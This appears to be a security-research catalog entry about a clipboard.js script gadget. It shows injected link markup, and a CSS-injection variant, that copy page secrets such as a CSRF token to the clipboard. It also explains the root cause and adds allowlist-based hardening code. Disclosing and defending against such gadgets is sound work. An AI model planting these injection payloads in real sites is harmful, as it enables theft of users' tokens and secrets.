Modern copy to clipboard. No Flash. Just 3kb gzipped.
This gadget is special: it allows copying the text content of any element specified by a selector in the data-clipboard-target attribute. When combined with an <a> tag and an additional click on the attacker’s website, it can be used to steal the contents of the clipboard.
The clipboard.js library uses “good-listener” to listen to events. This library delegates event listeners to the document, allowing them to be triggered at any time.
<div id="to_copy">Secret</div>
<!-- user input -->
<a href="https://gmsgadget.com/" class="copy-link" data-clipboard-action="copy" data-clipboard-target="#to_copy">Copy Text</a>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.11/clipboard.min.js"></script>
<script>
new ClipboardJS(".copy-link");
</script>
When chained with a CSS injection, it is possible to make script content render as display: block and so steal sensitive values such as CSRF tokens.
<script id="to_copy">CSRF_TOKEN=1234567890</script>
<!-- user input -->
<a href="https://gmsgadget.com/" class="copy-link" data-clipboard-action="copy" data-clipboard-target="#to_copy">Copy Text</a>
<style> * { display: block } </style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.11/clipboard.min.js"></script>
<script>
new ClipboardJS(".copy-link");
</script>
Root Cause
listenClick(trigger) {
    this.listener = listen(trigger, 'click', (e) => this.onClick(e));
}
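
One way to harden a page against both examples above, added here and not taken from the original page or from clipboard.js: pass a function as the library's `target` option so that the copy target comes from an allowlist instead of the data-clipboard-target attribute. The `.user-content` wrapper, the `share-url` id and the `resolveTarget` helper are assumptions made for illustration.

```javascript
// Added hardening example; not code from clipboard.js or from the original page.

const USER_CONTENT = ".user-content";    // hypothetical wrapper around untrusted markup
const COPYABLE = new Set(["share-url"]); // hypothetical allowlist of copyable element ids

// Decide what a clicked trigger may copy. Returning undefined hands
// clipboard.js no target (assumed 2.x behaviour: nothing is copied).
function resolveTarget(trigger, doc) {
  // A trigger injected into user content must never select page content.
  if (trigger.closest(USER_CONTENT)) return undefined;

  // Accept only a plain "#id" selector whose id is on the allowlist.
  const selector = trigger.getAttribute("data-clipboard-target") || "";
  const match = /^#([A-Za-z][\w-]*)$/.exec(selector);
  if (!match || !COPYABLE.has(match[1])) return undefined;

  // Refuse <script>/<style> even when injected CSS makes them visible.
  const el = doc.getElementById(match[1]);
  if (!el || /^(script|style)$/i.test(el.tagName)) return undefined;
  return el;
}

// Browser wiring: a `target` function replaces the attribute-driven default.
if (typeof ClipboardJS !== "undefined") {
  new ClipboardJS(".copy-link", {
    target: (trigger) => resolveTarget(trigger, document),
  });
}
```

Because the listener is delegated, any injected element matching `.copy-link` still reaches this callback, which is why the decision is made per click rather than at initialization.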
Found by @kevin_mizu.